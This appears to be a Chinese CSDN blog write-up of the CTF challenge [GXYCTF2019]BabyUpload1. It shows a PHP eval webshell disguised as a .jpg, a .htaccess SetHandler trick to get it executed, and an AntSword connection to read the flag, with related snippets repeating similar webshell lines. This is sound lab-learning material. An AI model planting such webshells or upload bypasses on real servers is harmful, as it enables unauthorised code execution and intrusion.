文件上传 [GXYCTF2019]BabyUpload1

最新推荐文章于 2024-03-03 12:02:10 发布
最新推荐文章于 2024-03-03 12:02:10 发布
阅读量337 收藏 2
点赞数 1
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75178803/article/details/134315796
版权

打开题目

传个是jpg文件后缀的一句话木马上去

代码如下

<script language='php'>@eval($_POST['v']);</script>   

发现上传成功

因此我们需要先上传 .htaccess 文件,然后再上传 2.jpg文件

.htaccess作用:文件将别的后缀名文件内容解析为php程序。

 但是在此之前我们需要注意两个点

1.htaccess文件内容必须包裹着要解析的文件名

如下

2.htaccess文件在上传的时候必须通过bp抓包来改变文件格式才能上传成功

接下来我们上传2.jpg

上传成功后我们访问一下路径

没有报错,说明上传成功

 接下来我们用蚁剑连接一下

在根目录下找到了flag

知识点:

其中.htaccess文件内容:SetHandler application/x-http-php的意思是设置当前目录所有文件都使用php解析,那么无论上传任何文件,只要符合php语言代码规范,就会被当做PHP执行。不符合规则则报错

如果在一个黑名单中添加了很多后缀名,唯独没有对htaccess过滤,可以直接上传.htaccess来设置使用php解析任意文件。

访白鹿
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[GXYCTF2019]BabyUpload 1 文件
weixin_45577185的博客
07-22 1887
源码: <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"textml; charset=utf-8\" /> <title>Upload</title> <form action=\"\" method=\"post\" enctype=\"multipart/form-data\"> 上文件<input type=\"file\" name=\"
CTF-WEB[GXYCTF 2019]BabyUpload
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
BUU实战笔记——[GXYCTF2019]BabyUpload 1
qq_51175992的博客
07-14 833
对于文件一般就是先找到可以上文件类型,然后看上去的文件是否可以正常使用,若不行,再考虑配置文件的方法。
[GXYCTF2019]BabyUpload1
qq_64201116的博客
05-14 2892
小小的文件,拿下!
[GXYCTF2019]BabyUpload1 -- 题目分析与详解
最新发布
2302_79800344的博客
03-03 1394
代码中并没有写统的一句话木马,因为直接写一句话木马需要关闭系统防火墙。.htaccess 文件
[GXYCTF2019]BabyUpload 1
qq_43618536的博客
07-03 457
BUUCTF的[GXYCTF2019]BabyUpload 1
精美网页模版,橙色政府网站建设
05-09
模板介绍: 风格清晰大气,结构规整,内置工作流,信息签收、信息签发、互动交流等常用政府网站功能,相对其他模板,此模板增加了网站常用一些参数统计和投稿统计,主要功能全部采用自定义模型,可以任意扩展字段和...
C#做的超市管理系统。
11-17
1. 商品管理:添加、修改和删除商品信息,包括商品名称、类别、价格、供应商等属性,以及库存数量的动态更新。 2. 库存管理:监控和调整商品库存,设置库存预警机制,防止过度库存或缺货情况发生。 3. 销售管理:...
authorware经典作品
03-09
authorware 端午节 转场 精彩 优秀 作品,包含代码 很容易作为模板使用,
2017-2019蓝桥杯省赛题解.rar
03-23
2017-2019蓝桥杯省赛题解
【web | CTF】BUUCTF [GXYCTF2019]BabyUpload1
weixin_46301214的博客
09-05 318
通常apache和nginx都包含有 .htaccess 配置文件,可以试试这个漏洞。后来发现问题在Content-Type里,只能上 image/jpeg 类型。但是发现还是能识别到,那就说明有php的特征被识别到了。那就需要使用图片码,但没有文件包含漏洞,无法执行。所以就采用上.htaccess配置文件来。就改用JavaScript变成php来执行。然后更改文件名为jpeg后缀,上。某文件变成php来执行。
BUUCTF:[GXYCTF2019]BabyUpload1
羽的博客
07-07 3003
文件漏洞。 不过这里我要吐槽一下,这个题首先他不允许.png文件, 再者.jpg文件不能大,打了也报错,不上去。 可想而知,我当时在做这个题的时候跟见了鬼一样难受,什么文件不了。 接着做题吧: 试着一个PHP文件,告诉我不能ph开头的文件后缀名,所以这里表示后端把所有php和php的别名都封死了。 根据之前upload-labs积累的绕过姿势,还可以上.htaccess文件。 再次上一句话木马时,又被拦截了,这里应该是后端检测了文件内容。盲猜检测<...
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞
weixin_44632787的博客
06-19 1882
BUUCTF之[GXYCTF2019]BabyUpload-------文件解析漏洞(.htaccess) 早上遇到一个文件解析漏洞,下午又遇到一个。。。。好吧,看来文件解析漏洞在CTF中也是很重要的一个知识点!!! 首先启动挑战项目 先正常的上一句话木马: GIF89a? <script language="php">eval($_POST['zyh']);</script> 我经常用这样的一句话木马,为了防止php文件内容被过滤啥的… 所以,把输的文件名改回1.pn
【CTF】[GXYCTF 2019]BabyUpload
西原一点红的博客
06-19 845
说明是黑名单,且对上的类型也做了校验。说明对上的内容也做了校验。4. 修改上内容绕过校验。
BUUCTF [极客大挑战 2019]Upload
m0_49025459的博客
05-12 4852
这题目是文件漏洞 看到这种上的漏洞,肯定就是上一句话木马,我们写一个正常的一句话木马先上试试 <?php phpinfo(); @eval($_POST['shell']); ?> 我们上之后,提示我们不是image格式,那么我们上的时候就抓一下包,修改一下上的格式 Content-Type: image/jpeg 放包 这时候我们发现,文件的后缀不能为php,文件绕过的格式也有很php,php3,php4,php5,phtml....
[GXYCTF2019]BabySQli 1
10-06
[GXYCTF2019]BabySQli1 是一个联合查询构建虚拟数据的例子。该例子中使用了base32和base64进行数据模糊化处理。在第二个引用中,通过联合查询构建了一个查询语句,将用户名设置为'1'并且选择了一个管理员账号和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值